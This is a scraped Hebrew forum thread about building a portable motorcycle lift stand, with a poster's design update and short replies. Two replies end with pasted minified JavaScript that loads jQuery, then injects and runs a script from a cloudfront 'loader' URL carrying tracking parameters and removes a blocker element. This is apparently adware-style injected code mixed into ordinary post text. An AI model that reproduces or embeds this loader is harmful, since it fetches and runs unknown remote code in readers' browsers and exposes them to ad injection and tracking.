Jump to content
  • הצטרפו למשפחה

    היי, היי אתה (או את) שם!

    אנחנו יודעים, נחמד להיות אנונימי, ולמי בכלל יש כוח להירשם או להיות עכשיו "החדשים האלה".

    אבל בתור חברי פורום רשומים תוכלו להנות ממערכת הודעות פרטיות, לנהל מעקב אחרי כל הנושאים בהם הייתם פעילים, ובכלל, להיות חלק מקהילת הרכב הכי גדולה, הכי מגניבה, וכן - גם הכי שרוטה, באינטרנט הישראלי. 

    אז קדימה, למה אתם מחכים? בואו והצטרפו ותהיו חלק מהמשפחה הקצת דפוקה שלנו.
     

dir="rtl" style="text-align:right;"> שימו לב! השרשור הזה בן 5212 ימים, שזה ממש ממש הרבה ולכן הוא ננעל.

אם אתם פותחי השרשור ו/או יש לכם עדכון רלוונטי לנושא - פנו לאחד המנהלים ונפתח את השרשור חזרה לתגובות.

פוסטים מומלצים

פורסם

יופי של רעיון שמאוד מקל על החיים.

ישי

 

המלצה נוספת ששכחתי בפעם הקודמת לחספס את המשטח, שמן שינזל על המשטח

והאופנוע יהפוך למחליק על קרח.....

 

מישהוא חשב לכתוב אלומניום מרוג ?

" בוא ניסע, ניתן למחלה לעבוד, נחזור עם מיכל ריק " . בגעגוע לישראל ז"ל

  • 7 חודשים מאוחר יותר...
פורסם
בעקבות הצעות שונות שהוצעו לגבי בניית הסטנד ממקורות שונים, להלן סטנד הרמה דור שני :D :

 

היה לי "באג" באבולוציית התכנון הקודם בכך שהתכנון המקורי היה שהפלטה תשב ישירות על הסטנד ובשלב מאוחר יותר לצורך חיבור הציר המרכזי הוספתי קורות אורך תחתונות. קורות האורך התחתונות ישבו על קורות רוחב שהיו תלויות על 3 ברגי פח מסכנים בכל צד וזווית שלא ידעה מה נפל עליה במקום על קורות האורך הנתמכות בקורות גובה ולא באוויר הצח.

 

ויתרתי על פטנת הרמת האופנוע (למרות שהוא היה מגניב מדעית... תראו לי מדען שדוחף דוקאטי ששוקל 200 ק"ג במעלה סטנד הרמה) לטובת הפיכתו לסטנד נייד, עם אפשרות קיבוע בעזרת רגלי צד מתקפלות וכן רמפת זווית מתפרקת שתשמש להעלאה והורדה של האופנוע, גם בכוח המנוע (תהיה מספיק מחוספסת כדי לספק אחיזה בעליה).

 

קיצרתי את מוטות האורך לטובת מרכז כובד נמוך יותר אך עדיין בגובה נוח מאוד לעבודה.

 

ו... בסיום הכל ירותך כמו שצריך :D

 

כאמור, השלב הבא יהיה בניית תושבות לקיבוע גלגל קדמי/אחורי וכן להרמה מלאה במקרה הצורך.

 

ושוב, תודה, הערות נוספות יתקבלו בברכה 8)

 

יפה מאוד!

מה הגובה של המתקן?

ואם יש לך טיפים נוספים למי שמתכנן לבנות כזה..

 

 

מif(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

פורסם
אני מריח rv50 בכיוון?

לא..

חבר מחפש BSA לשיפוץ ומתחיל "להכין את ה(מ)שטח"...

אם למישהו יש אופנוע בסגנון.. למשפץ מתחיל-נשמח לשמוע.

 

 

מif(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

×
×
  • תוכן חדש...